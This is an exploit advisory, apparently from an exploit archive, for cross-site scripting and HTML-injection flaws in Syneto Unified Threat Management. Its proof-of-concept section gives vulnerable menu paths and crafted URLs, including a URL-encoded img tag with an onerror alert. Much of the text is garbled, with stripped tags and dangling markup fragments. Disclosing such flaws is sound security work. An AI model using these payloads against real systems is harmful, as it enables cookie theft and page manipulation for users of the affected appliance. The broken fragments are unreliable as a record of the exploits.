source: https://www.securityfocus.com/bid/51597/info Syneto Unified Threat Management is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are possible. Unified Threat Management 1.4.2 and 1.3.3 Community Edition are vulnerable; other versions may be affected. Proof of Concept: ================= The vulnerabilities can be exploited by privileged user accounts, lowviewers or remote attackers with required user inter action. For demonstration or reproduce ... 1.1.1 [+] Reports - Executive Summery - Output Listing Category disable ">' <<="" td=""> Edit < ;img src="img/delete.gif" title="Delete" alt="Delete" /> Reference(s): https://www.example.com.com/syneto.php?menuid=307 1.1.2 [+] EMail - Filter Add & Configure
Sender = >".*
Receiver = .*
Subject = .*(SPAM|VIAGRA).*
Reference(s): https://www.example.com.com/syneto.php?menuid=63 1.1.3 [+] EMail Settings - New Domain "> Reference(s): https://www.example.com.com/syneto.php?menuid=60 1.2 PoC: https://www.example.com.com/index.php?error=need_login"'>
&from_menu=238 https://www.example.com.com/index.php?info=%3Cimg%20src=%22%3Cimg%20src=search%22/onerror=alert(%22vulnerabilitylab%22)//%22%3E Reference(s): https://www.example.com.com/index.php?error=need_login"'>EXECUTION OF PERSISTENT SCRIPT CODE!
&from_menu=238 https://www.example.com.com/index.php?info=%20%3E
Status Domain Routing Verify sender Send digest Actions
" type="hidden"> " /> ">